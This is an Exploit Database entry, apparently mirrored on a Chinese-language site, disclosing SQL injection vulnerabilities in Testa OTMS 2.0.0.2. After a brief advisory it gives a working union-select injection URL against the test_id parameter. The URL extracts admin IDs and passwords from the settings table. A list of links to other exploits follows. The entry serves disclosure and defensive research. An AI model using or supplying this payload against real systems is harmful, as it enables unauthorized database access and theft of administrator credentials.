Testa OTMS – Multiple SQL Injections

Exploit Database
18 阅读

作者： Ashiyane Digital Security Team

日期： 2013-11-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38842/

source: https://www.securityfocus.com/bid/63773/info

Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable. 

http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
http://www.example.com/test/admin/index.php

last Exploits
Testa OTMS – Multiple SQL Injections的更多信息

AneCMS 2e2c583 – Local File Inclusion：
Bellini/Supercook Wi-Fi Yumi SC200 – Multiple Vulnerabilities：
WordPress Plugin XCloner 4.2.12 – Remote Code Execution (Authenticated)：
Cilem Haber 1.4.4 (Tr) – Database Disclosure：
ProArcadeScript – ‘search.php’ Cross-Site Scripting：
Tecnovision DLX Spot – Arbitrary File Upload：
WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 – Remote Code Execution：
Joomla! Component FLEXIcontent 1.5 – Local File Inclusion：